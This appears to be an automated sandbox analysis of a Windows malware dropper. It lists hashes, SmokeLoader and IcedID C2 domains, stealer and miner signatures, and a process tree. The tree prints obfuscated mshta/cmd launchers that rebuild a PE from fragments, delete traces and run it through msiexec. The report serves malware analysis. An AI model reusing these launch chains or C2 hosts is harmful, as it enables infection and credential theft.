Resubmissions
23-10-2021 15:52
211023-tbkbesdcfm 1022-10-2021 17:40
211022-v8trsscggr 1022-10-2021 15:55
211022-tc9ygacgan 1022-10-2021 14:38
211022-rz1bfabgb8 10Analysis
-
max time kernel
740s -
max time network
1832s -
platform
windows11_x64 -
resource
win11 -
submitted
22-10-2021 14:38
General
-
Target
Fri051e1e7444.exe
-
Size
403KB
-
MD5
b4c503088928eef0e973a269f66a0dd2
-
SHA1
eb7f418b03aa9f21275de0393fcbf0d03b9719d5
-
SHA256
2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
-
SHA512
c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://gejajoo7.top/
http://sysaheu9.top/
rc4.i32
rc4.i32
Extracted
Family
icedid
Campaign
1875681804
C2
enticationmetho.ink
Signatures
-
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 16 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
-
Blocklisted process makes network request 40 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 6 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Checks for any installed AV software in registry 1 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 10 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
-
Suspicious use of SetThreadContext 9 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 38 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
-
NSIS installer 4 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 35 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 8 IoCs
-
Modifies system certificate store 2 TTPs 11 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"1⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\CoEA_w0kyWG2WXlI_NmzGIeB.exe"C:\Users\Admin\Pictures\Adobe Films\CoEA_w0kyWG2WXlI_NmzGIeB.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\6U5d9bdqsMb6CVYEgAtCoc7k.exe"C:\Users\Admin\Pictures\Adobe Films\6U5d9bdqsMb6CVYEgAtCoc7k.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\QLESn8qIBxPtJtPRbSsyAENo.exe"C:\Users\Admin\Pictures\Adobe Films\QLESn8qIBxPtJtPRbSsyAENo.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\wfTqKDpMOg0gUSDI4WZ8cFpx.exe"C:\Users\Admin\Documents\wfTqKDpMOg0gUSDI4WZ8cFpx.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\mx4lGdzRmaOHuNV50QSkuYOw.exe"C:\Users\Admin\Pictures\Adobe Films\mx4lGdzRmaOHuNV50QSkuYOw.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\fnK4zd6skiJ7xVbd0NQxDWHw.exe"C:\Users\Admin\Pictures\Adobe Films\fnK4zd6skiJ7xVbd0NQxDWHw.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 17285⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\ecofo8a9dM9rKhtzF6DUe5WS.exe"C:\Users\Admin\Pictures\Adobe Films\ecofo8a9dM9rKhtzF6DUe5WS.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\DQSpoAhLIdEaLNFmPL1y_5AQ.exe"C:\Users\Admin\Pictures\Adobe Films\DQSpoAhLIdEaLNFmPL1y_5AQ.exe" /mixtwo4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 2605⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\YsPBMke_f_nLTfrT7402u0TT.exe"C:\Users\Admin\Pictures\Adobe Films\YsPBMke_f_nLTfrT7402u0TT.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 2525⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\lyDzuY17TkHEDB9thlwY6UXK.exe"C:\Users\Admin\Pictures\Adobe Films\lyDzuY17TkHEDB9thlwY6UXK.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "0avwqQL9G3rPBLd3vS74Ps8l.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\On307XjhofH5hpn3XhRr0UJT.exe"C:\Users\Admin\Pictures\Adobe Films\On307XjhofH5hpn3XhRr0UJT.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-6TSP9.tmp\On307XjhofH5hpn3XhRr0UJT.tmp"C:\Users\Admin\AppData\Local\Temp\is-6TSP9.tmp\On307XjhofH5hpn3XhRr0UJT.tmp" /SL5="$2029C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\On307XjhofH5hpn3XhRr0UJT.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-95FI4.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-95FI4.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Reference Assemblies\JQIFIOEXVY\foldershare.exe"C:\Program Files\Reference Assemblies\JQIFIOEXVY\foldershare.exe" /VERYSILENT7⤵
-
C:\Users\Admin\AppData\Local\Temp\ba-7ddc2-0ef-cec9c-f5c75d27c13e0\Duxaqabaequ.exe"C:\Users\Admin\AppData\Local\Temp\ba-7ddc2-0ef-cec9c-f5c75d27c13e0\Duxaqabaequ.exe"7⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e68⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:39⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4268 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4868 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:19⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6124 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6124 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5364 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:19⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1060 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:19⤵
-
